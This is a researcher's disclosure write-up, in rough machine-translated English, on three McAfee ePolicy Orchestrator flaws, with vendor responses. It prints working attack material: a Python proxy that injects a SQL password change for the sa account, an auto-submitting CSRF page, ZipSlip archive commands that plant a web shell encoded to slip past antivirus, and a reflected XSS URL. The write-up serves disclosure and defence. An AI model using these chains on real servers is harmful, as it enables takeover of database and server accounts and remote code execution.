Vulnerability in McAfee epolicy orchestrator

McAfee ePO It's a software , Can help IT Administrators are unified across endpoints 、 The Internet 、 Data and from McAfee And compliance with third-party solutions security management of solutions .McAfee ePO Provide flexible automatic management functions , Used to identify 、 Deal with and respond to security issues and threats .

McAfee ePO Login page for

My test found three bugs ：

• CSRF + SSRF + MITM chain , If used successfully , Allows an attacker who is not logged in to execute remote code on the server
• As ZipSlip The result of the attack , The login user executes the code remotely
• reflective XSS

CSRF + SSRF + MITM = Command execution

The application contains a region , The administrator can verify the availability of the database , The database can then be used as the primary data store .

“ Configure database settings ” part

The following request must be sent to test the connection ：

POST /core/config HTTP/1.1
Host: epo.test:8443
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 279
Cookie: <cookies>

userAction=test&ajaxMode=nouser&orion.user.security.token=gYyieMaq4W1jNkhK&orion.user.security.token=gYyieMaq4W1jNkhK&db.server.name=127.0.0.1&db.instance.name=&db.port=50781&db.database.name=ePO_TEST&db.param.ssl=request&db.user.name=n1&db.user.domain=TEST

The request does not contain any information about CSRF Protection against attacks . up to now , We have a loophole , But it doesn't affect security , Because the request only tests the connection and does not save any rogue settings .

But please note how the test connection to the database is established . If the request specifies only the connection host and port , The application will use the current configuration （ Include user name 、 Password and database name ） To establish a connection to a specified server .

To demonstrate this and see what is included in the database connection request , I wrote a simple Python Script . It forwards all incoming requests to another host （ Actually ePO database ） And print the request to the screen .

adopt MiTM Server data

The fact proved that , In my case , Vulnerable servers pass NTLMSSP Authenticate the database , Then execute multiple SQL Query to get information from .

To exploit the vulnerability , We need to modify the query sent to the database . That's why in our MiTM Script , We will string “ ” Replace with “ ”. If it works , Testing the connection to the database will result in “SA” Set the password “[email protected]”.SETTRANSACTIONISOLATIONLEVELREADCOMMITTEDALTERLOGIN [sa]WITHPASSWORD='[email protected]';;;;

import socket
import sys

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

IP = "0.0.0.0" # IP and port of MiTM server
PORT = 1436
EPO_IP = "1.1.1.1"

print("[+] Starting MiTM server on port: {}".format(str(PORT)))

server_address = (IP, PORT)
sock.bind(server_address)
sock.listen(1)

server_address2 = (EPO_IP, 50781) # IP and PORT of ePO MSSQL database
sock2.connect(server_address2)

while True:
    connection, client_address = sock.accept()
    try:
        while True:
            data = connection.recv(4096)
            find = "S\x00E\x00T\x00 \x00T\x00R\x00A\x00N\x00S\x00A\x00C\x00T\x00I\x00O\x00N\x00 \x00I\x00S\x00O\x00L\x00A\x00T\x00I\x00O\x00N\x00 \x00L\x00E\x00V\x00E\x00L\x00 \x00R\x00E\x00A\x00D\x00 \x00C\x00O\x00M\x00M\x00I\x00T\x00T\x00E\x00D"
            if find in data:
                print("[+] Found string in request")
                replace = "A\x00L\x00T\x00E\x00R\x00 \x00L\x00O\x00G\x00I\x00N\x00 \x00[\x00s\x00a\x00]\x00 \x00W\x00I\x00T\x00H\x00 \x00P\x00A\x00S\x00S\x00W\x00O\x00R\x00D\x00=\x00'\x00P\[email protected]\x00s\x00s\x00w\x000\x00r\x00d\x00'\x00;\x00;\x00;\x00;\x00;"
                data = data.replace(find, replace)
            sock2.sendall(data)
            resp = sock2.recv(4096)
            connection.sendall(resp)
    finally:
        connection.close()

Now use the whole CSRF + SSRF + MITM chain , We just need to create one HTML page .

<html>
  <body onload="document.getElementById('poc_form').submit()">
    <form action="https://epo.test:8443/core/config" method="POST" id="poc_form">
      <input type="hidden" name="userAction" value="test" />
      <input type="hidden" name="ajaxMode" value="nouser" />
      <input type="hidden" name="db&#46;server&#46;name" value="<MITM_host>" />
      <input type="hidden" name="db&#46;instance&#46;name" value="" />
      <input type="hidden" name="db&#46;port" value="<MITM_port>" />
    </form>
  </body>
</html>

Let's put the bug into action . function MITM Script , stay ePolicy Orchestrator Enter credentials in the management panel , Then open the... We made HTML page . If everything is done correctly , We can use credentials to connect to the database SA:[email protected]. give the result as follows ：

Use xp_cmdshell Process execution OS command

After successfully connecting to the database , We can run any system command .

Sum up , The attack consists of five parts ：

1. The administrator opens the malicious HTML page .
2. Simulate the administrator's POST The request is sent to /core/config, This will cause the target server to connect to MITM The server .
3. MITM The server will proxy all traffic to SQL The server （ It should be externally accessible ） And inject a SQL Query to change the user SA Password .
4. Use by attackers SA The user name and the newly set password are connected to SQL The server .
5. An attacker can now run arbitrary server commands .

Supplier response ： “McAfee Already looked at the code base , We believe that this problem is already in 2019 year 11 month 12 Cumulative updates released on the day (CU) 5 To be solved .”

Certified command execution

I am in the software extension component (/core/orionNavigationLogin.do#/core/orionTab.do?sectionId=orion.software&tabId=orion.extensions) The next vulnerability was found in , Only authenticated users can access this vulnerability .

“ Software extensions ” part

This page prompts you to upload the extension , The extension should be ZIP File format . I don't know the file structure required for an application to recognize a file as a true extension , So I didn't try to upload any malicious extensions at this time . But when I encountered the archive upload function during the test , I always check ZipSlip Loophole .

ZipSlip A vulnerability is a path traversal , If the name of the package file is not cleaned up correctly , This happens when the file is decompressed . Attackers can use ../ The name contains “ ” File creation archive , Thus, any file can be uploaded to any directory or the existing file can be overwritten during file extraction .

To check for this vulnerability , We will use evilarc Generate an include file ../test.txt.

python evilarc.py -d 1 -p '' -o win -f test.zip test.txt

Create malice zip file

And then what will be generated ZIP Upload the archive as an extension and try to find it in the file system .

Extract the location of the file

We can see that the test files are located in the folder D:\Program Files\McAfee\Server\extensions\tmp\.Web The root folder of the server is D:\Program Files\McAfee\Server\webapps\ROOT, So now we know that the generation contains Web shell (stat.jsp) The relative path required for archiving , The archive will pass ZipSlip Unzipped to the server's Web Root folder ：

python evilarc.py -d 3 -p 'webapps\ROOT\' -o win -f PoC.zip stat.jsp

Use web shell Create malice zip file

Upload JSP shell when , We use Unicode Code it , In order to Windows Defender It will not be deleted .

Now just upload PoC.zip As an extension and check for running web shell.

perform “dir” command

The result is that we can run any operating system command .

Supplier response ： “ We don't think this is RCE, because ePO Administrators in the user interface can install extensions for their products .McAfee At present, I think , When ePO When the administrator installs the extension , The scenario you describe will work as expected .”

reflective XSS

For exploit , Just go to the address /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E, As proof of concept , You will see a containing document.domain Value pop-up window .